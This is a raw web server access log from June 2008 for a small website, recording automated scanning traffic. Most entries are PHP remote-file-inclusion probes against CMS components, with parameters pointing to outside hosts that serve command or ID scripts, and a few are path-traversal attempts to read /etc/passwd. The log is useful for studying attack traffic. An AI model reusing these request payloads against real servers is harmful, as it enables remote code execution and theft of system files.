210.17.246.29 - - [01/Jun/2008:17:00:37 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
210.17.246.29 - - [01/Jun/2008:17:00:39 -0700] "GET //skin/zero_vote/error.php?dir=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
210.17.246.29 - - [01/Jun/2008:17:00:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
61.64.112.207 - - [01/Jun/2008:17:01:14 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
75.126.86.186 - - [01/Jun/2008:17:01:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
75.126.86.186 - - [01/Jun/2008:17:01:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
61.64.112.207 - - [01/Jun/2008:17:01:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
75.126.86.186 - - [01/Jun/2008:17:01:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
75.126.86.186 - - [01/Jun/2008:17:01:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
61.64.112.207 - - [01/Jun/2008:17:01:20 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:02:22 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:02:22 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:02:22 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:02:24 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:02:24 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:02:24 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.14.127.59 - - [01/Jun/2008:17:02:49 -0700] "GET /logs/access.log//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
216.14.127.59 - - [01/Jun/2008:17:02:49 -0700] "GET /logs//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:03:03 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:03:03 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:03:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
194.87.5.70 - - [01/Jun/2008:17:03:26 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
194.87.5.70 - - [01/Jun/2008:17:03:27 -0700] "GET /newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:17:04:21 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:17:04:22 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:17:04:22 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:04:37 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:04:37 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:05:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:05:49 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:06:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:06:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
217.153.141.220 - - [01/Jun/2008:17:06:06 -0700] "GET /logs/access_080310.log/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.153.141.220 - - [01/Jun/2008:17:06:06 -0700] "GET /newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.153.141.220 - - [01/Jun/2008:17:06:07 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:06:10 -0700] "GET /?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:06:10 -0700] "GET /logs/?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 200 6658 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:06:55 -0700] "GET /logs/?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 200 6658 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:06:55 -0700] "GET /?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
219.94.133.251 - - [01/Jun/2008:17:07:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:07:20 -0700] "GET //inc/errors.php?error=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:07:20 -0700] "GET /logs//inc/errors.php?error=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:17:07:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:07:43 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:07:45 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:07:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:07:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:07:47 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:07:54 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.153.141.220 - - [01/Jun/2008:17:08:12 -0700] "GET /logs/access_080407.log/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:17:08:28 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:17:08:30 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
119.110.98.132 - - [01/Jun/2008:17:08:59 -0700] "GET /logs/%3Cwbr%20/%3Eaccess.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
119.110.98.132 - - [01/Jun/2008:17:09:00 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
119.110.98.132 - - [01/Jun/2008:17:09:00 -0700] "GET /logs/%3Cwbr%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
219.94.133.251 - - [01/Jun/2008:17:09:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:17:10:51 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:17:10:52 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
65.55.232.23 - - [01/Jun/2008:17:10:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
65.55.232.23 - - [01/Jun/2008:17:11:00 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
65.55.232.23 - - [01/Jun/2008:17:11:01 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
72.47.213.57 - - [01/Jun/2008:17:11:13 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.249.73.97 - - [01/Jun/2008:17:11:52 -0700] "GET /logs/access_080317.log HTTP/1.1" 200 4967134 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:17:11:54 -0700] "GET /logs/mcf.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:17:11:56 -0700] "GET /mcf.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:17:12:32 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:17:12:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:17:12:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:13:47 -0700] "GET /logs/access_080211.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:13:47 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:13:47 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:13:49 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:13:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:13:49 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
66.90.73.127 - - [01/Jun/2008:17:13:52 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.90.73.127 - - [01/Jun/2008:17:13:53 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:15:14 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:15:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:15:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:17:15:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
202.181.105.117 - - [01/Jun/2008:17:17:11 -0700] "GET /logs/access_080414.log/main.php?x=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:17:45 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:17:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:17:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:18:09 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:18:09 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:18:10 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:17:18:10 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
66.249.73.97 - - [01/Jun/2008:17:19:44 -0700] "GET /logs/access_080512.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
82.77.11.177 - - [01/Jun/2008:17:19:47 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.conplus.de/testwde/contenido/includes/mrid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
82.77.11.177 - - [01/Jun/2008:17:19:48 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.conplus.de/testwde/contenido/includes/mrid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
82.77.11.177 - - [01/Jun/2008:17:19:48 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.conplus.de/testwde/contenido/includes/mrid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.7.108.240 - - [01/Jun/2008:17:19:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.77.11.177 - - [01/Jun/2008:17:20:23 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.conplus.de/testwde/contenido/includes/mrid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
82.77.11.177 - - [01/Jun/2008:17:20:23 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.conplus.de/testwde/contenido/includes/mrid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
82.77.11.177 - - [01/Jun/2008:17:20:23 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.conplus.de/testwde/contenido/includes/mrid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
193.252.3.200 - - [01/Jun/2008:17:22:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.47.213.57 - - [01/Jun/2008:17:22:31 -0700] "GET /logs/access_080310.log//load_lang.php?_SERWEB[serwebdir]=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.47.213.57 - - [01/Jun/2008:17:22:31 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:23:08 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:23:08 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:23:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.252.3.200 - - [01/Jun/2008:17:23:38 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.252.3.200 - - [01/Jun/2008:17:23:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.252.3.200 - - [01/Jun/2008:17:23:54 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:24:44 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:24:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:17:24:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
